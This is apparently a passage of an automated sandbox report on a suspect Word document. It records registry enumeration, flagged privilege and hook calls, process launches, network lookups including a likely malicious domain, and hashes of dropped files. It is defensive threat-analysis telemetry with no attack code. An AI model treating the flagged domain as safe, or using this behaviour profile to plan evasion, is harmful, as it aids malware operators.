Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc" /o ""

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 23.40.43.41:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 41.43.40.23.in-addr.arpa udp
US 8.8.8.8:53 57.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 khalilmouna.com udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 khalilmouna.com udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/5056-0-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-2-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-1-0x00007FFCC868D000-0x00007FFCC868E000-memory.dmp

memory/5056-3-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-4-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-9-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-8-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-7-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-10-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-13-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-14-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-16-0x00007FFC86010000-0x00007FFC86020000-memory.dmp

memory/5056-20-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-19-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-18-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-17-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-15-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-12-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-11-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-6-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-5-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-21-0x00007FFC86010000-0x00007FFC86020000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 4da2b06993cb4f34219b69720724a385
SHA1 1e2839989c3dd182aa6dffd4915dddcc36828d4c
SHA256 807413247f55e6b88d9ab74e530277123bcead1f7d6dcce7b54e7855296de6fe
SHA512 e008341fe1b527d0cf65ea11da860840a2ed4183b676957804356af803ca193ff82aa19bd839b7d2a0fc17947158da969ebd5e51cd151f1a8d2900d7fe79d0e3

C:\Users\Admin\AppData\Local\Temp\TCDF0BD.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

memory/5056-158-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-159-0x00007FFCC868D000-0x00007FFCC868E000-memory.dmp

memory/5056-160-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-161-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

memory/5056-216-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8FE65FAD-9E20-43EC-AC0F-0379A1001ACC

MD5 3051e3d6608a19e0d135373ec7312933
SHA1 b75555ba945999217d82634536b8d89385f9ccb7
SHA256 75c3da416acaba8c1d48e38e8d22fbea651aeab6c45a5100359edc3f71264b6a
SHA512 936fff033bf558192d983203d8f35330d62cfd8f97be253c3b50efe7444790132c82c0444f65d65d81c8b05ee706b13003b6638aa1e4825fa87a8f9ecb1cb643

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

MD5 cf5738f750f75cf9f0a5488e64c76120
SHA1 9f75b4bad734e2cae17f5f4fcb2c789793efdcf1
SHA256 b7d6c7eec9813b4e08ceec520ec99b2b4147713a4d4a68f90fb45ebef06c0cf4
SHA512 72e022c2f28a1689d9c9966ba28d6c6ac9da734724b3ee012880cef2d1dfa88c7b7115d1047de952dabe4781b531878b457a390b4f249b02e1a019be9e4f4032

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

MD5 a755f0acd8b340b3cadf23f7896c7f8e
SHA1 ba6408cb151085be7a4dda27f27c40391e5a998e
SHA256 2ce0a7c5154a48374d0aad267d718a9df495c12914ec6cc5716ead2d6133802a
SHA512 346cfeedea4788603b7bb3e1530f0ba2730435f8a3153069b5cbc712b329f999b669896405f84c33a3a3c9743095044fbb07794b5f8fe1b91fded7b3d2da2255

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml

MD5 e7f663ce715a2b74c17a013567b05926
SHA1 2b281c8ca9e1832394d0561a7cd6217393141545
SHA256 26776f52e21b7864c6a8aff3d8dbd1d73618214a9de454e922852c320465730b
SHA512 5600cc8c25a390b6a0b71108641d8974662b28464be8e5185dfe4313f37e5cd07d32c572219d6079efdf1081b455e1eb5315084fe5a0f1b8dc40cbe4cb1eb7a2

C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal

MD5 f0b5a5f11c34b5d1083141de61563db7
SHA1 9aa876601b4a108d12660fce1dde25488fcccee7
SHA256 b514aa0795efa02b8e85a58854fc104d33056dae90d894eb0c27fb6aeaeb4bd4
SHA512 a8c9211a2e3762211634fbf82e0791fd1c9dbafffe1b0a324d24c13613e521a4471fd66fc8046cbd528c34ab4c11d1f6c3742284f3c4432d32b0440d4cacf6d2

C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

MD5 dde1589a74c89e1d1f57a790858b2e6d
SHA1 79abf6845b4da72d012a9c9cd7b2e1683d1259eb
SHA256 00a9525e59342bc052525e31ebdd509e313478e2ec96eb95cceb143fb0134435
SHA512 725b281f36a9cefbe35a64082c42301fb1d8c43c3b10f4627a4bae3cc38e3cfc28bddfcb0b0d98791562dc56733ec58f2a756489ebabcb914b7871413b8a78e1

memory/5056-1211-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-1210-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-1209-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-1208-0x00007FFC88670000-0x00007FFC88680000-memory.dmp

memory/5056-1212-0x00007FFCC85F0000-0x00007FFCC87E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

MD5 6702423ea30b60fc6375e6f36716c2ec
SHA1 b275d4f2684e27db095c5243348007f6815b53dc
SHA256 e15a3a03d44d6b6f4cb595179735d41c07142f2ae123693561776638a1e58560
SHA512 e7d3d5fd049a81f392bf8ea3ab693b89783b197193d6df0e776e6327559be18b9edb7d9abb91d4b8e5206803eb7d6e9bc520f98c5b87d6c3a5a0899b0a9461ac

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

MD5 67f36f3c0ac40b3318b0241f929fe06b
SHA1 7b9aee92f248b674b974a8469fd0b0ddddf6243d
SHA256 59f39c79c6f4ce39372c39f194fea499d0bf1eef2ecb2f2b7a941898fd7200f2
SHA512 d58458e054b4c202a887c57b234cdce0913ed83481237700d70ac51412273289d49dcf79c29f06a1b87749020a66a4b7b3a280886ff8ae0c60e5cbc9debef279

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

MD5 02c148161758eddd6969936ee3d14c42
SHA1 4170a5b89cbb7230aabc2c1229211b58bee335ba
SHA256 454c8280003659ec7d5e0ba29ad0e3a2efb5860a93790b8d8f37cc2d3dc3c554
SHA512 9f0b71f3a08729fa899a1ec390f986ab7b48cc72b751382ba93d46d457ae5b9101265434fdf764aa63bcf44466ce9d20b82b4d40b65c22a69cfb53365397277f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

MD5 c3716db40aa762d92bcc6900bec207a8
SHA1 186d225cd941b156fdaddf738570a507e022f5d0
SHA256 bb2121f1bf49632196ec8d6c668d57c837701a2565367c567bc344db5add2230
SHA512 bdb3839756eab4ffdb4589dcde32f84eaf9338c573002eab2a51b0263f40a341344276dac60f6b5620bbca3985428a9dd7612cdbf3d59dd12dc0b71b9fe0cc61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

MD5 2101ed6b914563d2f40db518fa378460
SHA1 d2347f7b623d3316dbc57d1414aaf2150bba16b5
SHA256 56e8a6de3b75a0604dbd50e25c957a115704415cf7e5417747c0b851e828b915
SHA512 d1d67642accb87babe49e62ca1f9ca5133479fa24eaa15f34d13ddeff671d5d997d7e0786f6d0eed3a6f10afeb09ceb1ffcb9360b1095f13d1d31894b68cf188

C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

MD5 085ebd119f5fc6b8f63720fac1166ff5
SHA1 af066018aadec31b8e70a124a158736aca897306
SHA256 b8411fe8ec499074fca9047f6983d920279e84ddf3b02b2dd5c08cf07ec44687
SHA512 adb0522830db26123347cb485c43b156f5c888510e52091ba0fafc22b650ad29630c027746c920321905c28259dce7ff63dded93a79efddd5567c68312117875

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

MD5 939f2022a71047904c98ff54bd243240
SHA1 a25aa41b61c51abd990f72c390bf242314b11c79
SHA256 d9384aeb11784a25b5e272810eee21c1c8270ce8f8610967b1764b5904eca50b
SHA512 8aeb58915c9260b2ab73b085aa05980bc22203d52c5d0f4a69e301952100802ffcb8a53b008351a78ae324194a081cae1182fbdc88195e259e69015578e34598

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 a5d6343612912799e60c9e4869afef41
SHA1 ac4e6808d0a2069310dcaa1b647da6d77ab8e34d
SHA256 1961f6883136fe0dde34a8ed4a2b7d979d40598dbf2318cd7a61e4a3cf9bc998
SHA512 98a91c7333d1e072b74bdd0377bdde43472d56d59da040a2e04e1d123aa38fd2b437d8278b13c8aceb008d01e657e3dd73a5b8d57df749205ee9a6abad5a8543

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 0e42313c51f7d1fb5d07cb8f799287fa
SHA1 ec5cd946ab5b9521a1fb52f90932c6adb0e72913
SHA256 57abf9e876c633826314e11730ff0d8135aa791391920c95cd3740a00d06e449
SHA512 8ad4575b65d26d3980a3d69da50f31143dc2c6fb8feca0a81212f137f721d4e5a95d36958821b96ab8e25690bc1f2b59c7dadb8f6946d3d7566fbd1ecaec9e76

C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal

MD5 b7977123ea09aa560201276f164cfb87
SHA1 fc5af7de88091231f85be4fbe11ee8b94e7a28e3
SHA256 46e7743eb7506c0688431e59959921006b5bff8bdd7eb3ec19bba127ec5f1af3
SHA512 575dc72f1039faea3f5d1e2161e195ed25414796ff5c4fae97f917ea2b67ef6f5a1b452a98d678415fc0124035870df3b0aa4d62f7a43fdfc841c7cbc57533ad

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json

MD5 e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1 5281eae96efde7b0e16a1d977f005f0d3bd7aad0
SHA256 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31
SHA512 bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.json

MD5 c56ff60fbd601e84edd5a0ff1010d584
SHA1 342abb130dabeacde1d8ced806d67a3aef00a749
SHA256 200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c
SHA512 acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json

MD5 f1b59332b953b3c99b3c95a44249c0d2
SHA1 1b16a2ca32bf8481e18ff8b7365229b598908991
SHA256 138e49660d259061d8152137abd8829acdfb78b69179890beb489fe3ffe23e0c
SHA512 3c1f99ecc394df3741be875fbe8d95e249d1d9ac220805794a22caf81620d5fdd3cce19260d94c0829b3160b28a2b4042e46b56398e60f72134e49254e9679a4